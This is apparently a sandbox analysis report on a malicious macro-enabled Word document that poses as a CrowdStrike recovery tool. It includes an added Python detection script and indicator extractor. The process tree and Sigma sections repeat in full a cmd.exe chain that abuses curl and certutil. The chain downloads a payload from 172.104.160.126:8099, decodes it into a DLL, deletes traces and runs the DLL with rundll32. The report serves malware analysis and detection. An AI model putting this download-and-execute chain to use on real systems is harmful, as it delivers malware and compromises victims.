

Windows Analysis Report
New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Overview

General Information

Sample name: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
Analysis ID: 1478411
MD5: dd2100dfa067caae416b885637adc4ef
SHA1: 499f8881f4927e7b4a1a0448f62c60741ea6d44b
SHA256: 803727ccdf441e49096f3fd48107a5fe55c56c080f46773cd649c9e55ec1be61
Tags: docm

Detection

Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document exploit detected (process start blacklist hit)
Downloads suspicious files via Chrome
Machine Learning detection for dropped file
Sigma detected: Legitimate Application Dropped Executable
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Microsoft Office Child Process
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Found potential string decryption / allocating functions
IP address seen in connection with other malware
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Copy From or To System Directory
Uses Microsoft's Enhanced Cryptographic Provider
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 1384 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • cmd.exe (PID: 300 cmdline: "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • xcopy.exe (PID: 3096 cmdline: xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp MD5: 20CF8728C55A8743AAC86FB8D30EA898)
      • certutil.exe (PID: 3112 cmdline: certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt MD5: 4586B77B18FA9A8518AF76CA8FD247D9)
      • certutil.exe (PID: 3128 cmdline: certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe MD5: 4586B77B18FA9A8518AF76CA8FD247D9)
      • curl.exe (PID: 3136 cmdline: C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • certutil.exe (PID: 3152 cmdline: certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll MD5: 4586B77B18FA9A8518AF76CA8FD247D9)
      • rundll32.exe (PID: 3160 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain MD5: DD81D91FF3B0763C392422865C9AC12E)
  • chrome.exe (PID: 3236 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)
    • chrome.exe (PID: 3428 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1352 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)
    • chrome.exe (PID: 3224 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2208 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)
  • chrome.exe (PID: 300 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" "https://go.microsoft.com/fwlink/?linkid=2280386" MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)
  • WINWORD.EXE (PID: 300 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • cmd.exe (PID: 3616 cmdline: "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • xcopy.exe (PID: 3644 cmdline: xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp MD5: 20CF8728C55A8743AAC86FB8D30EA898)
      • certutil.exe (PID: 3548 cmdline: certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt MD5: 4586B77B18FA9A8518AF76CA8FD247D9)
      • certutil.exe (PID: 3796 cmdline: certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe MD5: 4586B77B18FA9A8518AF76CA8FD247D9)
      • curl.exe (PID: 2432 cmdline: C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • certutil.exe (PID: 2724 cmdline: certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll MD5: 4586B77B18FA9A8518AF76CA8FD247D9)
      • rundll32.exe (PID: 2360 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup
No configs have been found
No yara matches
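The process tree above is the whole kill chain in one cmd.exe line: WINWORD spawns cmd.exe, xcopy stages a copy of the system curl.exe in %TEMP%, certutil re-encodes and re-decodes it (a fresh file written by a "legitimate" tool), curl fetches payload2.txt, certutil decodes it into mscorsvc.dll, and rundll32 loads it. The block below is an added example, not part of the Joe Sandbox report and not the code of any of the Sigma rules it lists: it turns the behaviours those rules flag into six process-creation checks and runs them over events constructed from the PID 1384 branch of the tree (the event field names mimic Sysmon Event ID 1, which is an assumption about the log source). `extract_iocs` also pulls the download URL and the dropped file names out of the cmd.exe command line for blocking and hunting.

```python
"""Process-creation detections for the WINWORD -> cmd.exe -> LOLBin chain above.
Added example, not part of the Joe Sandbox report or of any Sigma rule's own code.
EVENTS is constructed from the process tree (WINWORD PID 1384 branch); field names
follow Sysmon Event ID 1, which is an assumption about the log source."""
import re
from collections import defaultdict

TEMP = r"C:\Users\user\AppData\Local\Temp"
SYS32 = r"C:\Windows\System32"
WINWORD = r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"
# The cmd.exe /c line as the macro built it, one "&"-joined step per entry.
CHAIN = rf'"{SYS32}\cmd.exe" /c ' + " & ".join([
    rf"xcopy {SYS32}\curl.exe {TEMP}",
    rf"certutil -f -encode {TEMP}\curl.exe {TEMP}\curl.txt",
    rf"certutil -f -decode {TEMP}\curl.txt {TEMP}\curl.exe",
    rf"{TEMP}\curl.exe http://172.104.160.126:8099/payload2.txt -o {TEMP}\mscorsvc.txt",
    rf"certutil -f -decode {TEMP}\mscorsvc.txt {TEMP}\mscorsvc.dll",
    rf"del {TEMP}\curl.exe", rf"del {TEMP}\curl.txt",
    rf"del {TEMP}\curl.exe", rf"del {TEMP}\mscorsvc.txt",
    rf'START " " rundll32 {TEMP}\mscorsvc.dll,DllMain', "exit",
])

def make_event(pid, ppid, image, cmdline):
    return {"ProcessId": pid, "ParentProcessId": ppid, "Image": image, "CommandLine": cmdline}

EVENTS = [  # constructed from the report's process tree (WINWORD PID 1384 branch)
    make_event(1384, 1, WINWORD, f'"{WINWORD}" /Automation -Embedding'),
    make_event(300, 1384, rf"{SYS32}\cmd.exe", CHAIN),
    make_event(3096, 300, rf"{SYS32}\xcopy.exe", rf"xcopy {SYS32}\curl.exe {TEMP}"),
    make_event(3112, 300, rf"{SYS32}\certutil.exe", rf"certutil -f -encode {TEMP}\curl.exe {TEMP}\curl.txt"),
    make_event(3128, 300, rf"{SYS32}\certutil.exe", rf"certutil -f -decode {TEMP}\curl.txt {TEMP}\curl.exe"),
    make_event(3136, 300, rf"{TEMP}\curl.exe", rf"{TEMP}\curl.exe http://172.104.160.126:8099/payload2.txt -o {TEMP}\mscorsvc.txt"),
    make_event(3152, 300, rf"{SYS32}\certutil.exe", rf"certutil -f -decode {TEMP}\mscorsvc.txt {TEMP}\mscorsvc.dll"),
    make_event(3160, 300, rf"{SYS32}\rundll32.exe", rf"rundll32 {TEMP}\mscorsvc.dll,DllMain"),
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe",
            "rundll32.exe", "regsvr32.exe", "certutil.exe", "curl.exe", "bitsadmin.exe"}
LOLBINS = {"certutil", "curl", "rundll32", "xcopy", "regsvr32", "mshta", "bitsadmin", "msiexec"}
USER_WRITABLE = re.compile(r"\\(AppData\\Local\\Temp|Users\\Public|ProgramData)(\\|\s|$)", re.I)
SYSTEM_DIR = re.compile(r"[A-Za-z]:\\Windows\\System32\\\S+", re.I)

def basename(path):
    return path.strip('"').rsplit("\\", 1)[-1].lower()

def split_chain(cmdline):
    """Steps of a `cmd.exe /c a & b & c` line (no step in this chain quotes an '&')."""
    m = re.search(r"\s/c\s+(.*)$", cmdline, re.I | re.S)
    body = m.group(1) if m else cmdline
    return [s.strip() for s in body.split(" & ") if s.strip()]

def step_programs(cmdline):
    """Program run by each step, with `START "title"` unwrapped and `.exe` dropped."""
    progs = []
    for step in split_chain(cmdline):
        step = re.sub(r'^start\s+("[^"]*")?\s*', "", step, flags=re.I)
        progs.append(re.sub(r"\.exe$", "", basename(step.split()[0])))
    return progs

def extract_iocs(cmdline):
    """URLs and files written under user-writable paths, for blocking and hunting."""
    urls = set(re.findall(r'https?://[^\s"&]+', cmdline))
    paths = re.findall(r'[A-Za-z]:\\[^\s"&,]+', cmdline)
    dropped = {p for p in paths if USER_WRITABLE.search(p) and "." in basename(p)}
    return {"urls": sorted(urls), "dropped": sorted(dropped)}

RULES = {  # rule name -> predicate over (event, parent event or None)
    "suspicious_office_child_process": lambda e, p: p is not None
        and basename(p["Image"]) in OFFICE and basename(e["Image"]) in CHILDREN,
    "copy_from_system_directory": lambda e, p: basename(e["Image"]) in {"xcopy.exe", "robocopy.exe"}
        and SYSTEM_DIR.search(e["CommandLine"]) and USER_WRITABLE.search(e["CommandLine"]),
    "certutil_decode": lambda e, p: basename(e["Image"]) == "certutil.exe"
        and re.search(r"\s-(decode|decodehex|urlcache)\b", e["CommandLine"], re.I),
    "execution_from_user_writable_dir": lambda e, p: USER_WRITABLE.search(e["Image"]),
    "rundll32_dll_from_user_writable_dir": lambda e, p: basename(e["Image"]) == "rundll32.exe"
        and USER_WRITABLE.search(e["CommandLine"]),
    "lolbin_chain_in_single_cmdline": lambda e, p: basename(e["Image"]) == "cmd.exe"
        and len(LOLBINS & set(step_programs(e["CommandLine"]))) >= 3,
}

def analyze(events):
    """Map rule name -> sorted PIDs that triggered it (parent resolved by PID)."""
    by_pid = {e["ProcessId"]: e for e in events}
    hits = defaultdict(list)
    for e in events:
        parent = by_pid.get(e["ParentProcessId"])
        for name, pred in RULES.items():
            if pred(e, parent):
                hits[name].append(e["ProcessId"])
    return {k: sorted(v) for k, v in hits.items()}

if __name__ == "__main__":
    for name, pids in analyze(EVENTS).items():
        print(f"{name:40s} PIDs {pids}")
    print(extract_iocs(CHAIN))
```

Every check keys on a relationship (parent/child, source/destination directory, program/argument) rather than on the payload hash, so the same logic fires when the next variant swaps mscorsvc.dll or the download host. Note what it would miss: the report's "Legitimate Application Dropped Executable" hit comes from a file-creation event (certutil writing curl.exe to Temp), which needs Sysmon Event ID 11 rather than ProcessCreate.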

System Summary

Source: File created; Author: frack113, Florian Roth (Nextron Systems); Data: EventID: 11, Image: C:\Windows\System32\certutil.exe, ProcessId: 3128, TargetFilename: C:\Users\user\AppData\Local\Temp\curl.exe
Source: Threat created; Author: Perez Diego (@darkquassar), oscd.community; Data: EventID: 8, SourceImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, SourceProcessId: 300, StartAddress: 772EA280, TargetImage: C:\Windows\System32\cmd.exe, TargetProcessId: 300
Source: Process started; Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io; Data: Command: "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 1384, ParentProcessName: WINWORD.EXE, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: Process started; Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 1384, ParentProcessName: WINWORD.EXE, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: File created; Author: Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 1384, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
No Snort rule has matched


AV Detection

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm; ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRC0001.tmp; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\curl.exe; Code function: 7_2_000000013F4D9BD0 CryptAcquireContextA,CryptCreateHash,
Source: C:\Users\user\AppData\Local\Temp\curl.exe; Code function: 7_2_000000013F4D9C20 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
Source: C:\Users\user\AppData\Local\Temp\curl.exe; Code function: 7_2_000000013F4D9C9C CryptHashData,
Source: C:\Users\user\AppData\Local\Temp\curl.exe; Code function: 22_2_000000013F359BD0 CryptAcquireContextA,CryptCreateHash,
Source: C:\Users\user\AppData\Local\Temp\curl.exe; Code function: 22_2_000000013F359C20 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
Source: C:\Users\user\AppData\Local\Temp\curl.exe; Code function: 22_2_000000013F359C9C CryptHashData,
Source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe; Directory created: C:\Program Files\Google
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe; Directory created: C:\Program Files\Google\GoogleUpdater
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe; Directory created: C:\Program Files\chrome_BITS_3236_441263539
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: curl.pdb source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000007.00000000.382535315.000000013F4DE000.00000002.00000001.01000000.00000004.sdmp, xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process created: C:\Windows\System32\cmd.exe
Source: Joe Sandbox View; IP Address: 239.255.255.250
Source: C:\Users\user\AppData\Local\Temp\curl.exe; Code function: 7_2_000000013F4A2738 recv,WSAGetLastError,
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9512A27C-373D-4C6D-8C25-ECB66CCA249E}.tmp
Source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe; String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmp; String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000007.00000000.382535315.000000013F4DE000.00000002.00000001.01000000.00000004.sdmp; String found in binary or memory: Usage: curl [options...] <url>
Source: xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe; String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp; String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp; String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe.4.dr; String found in binary or memory: Usage: curl [options...] <url>
Source: global traffic; DNS traffic detected: DNS query: www.google.com
Source: global traffic; DNS traffic detected: DNS query: sb-ssl.google.com
Source: unknown; HTTP traffic detected:
  POST /safebrowsing/clientreport/download?key=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
  Host: sb-ssl.google.com
  Connection: keep-alive
  Content-Length: 1073
  Content-Type: application/octet-stream
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: empty
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
  Accept-Encoding: gzip, deflate, br
Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr; String found in binary or memory: http://172.104.160.
Source: vbaProject.bin; String found in binary or memory: http://172.104.160.126:8099
Source: curl.exe, 00000016.00000002.523173521.0000000000070000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://172.104.160.126:8099/payload2.txt
Source: vbaProject.bin; String found in binary or memory: http://172.104.160.126:80X99
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr; String found in binary or memory: https://aka.ms/WRH
Source: document.xml; String found in binary or memory: https://aka.ms/vs/17/release/vc_redist.x64.exe
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr; String found in binary or memory: https://azure.status.microsoft/status
Source: curl.exe; String found in binary or memory: https://curl.se/
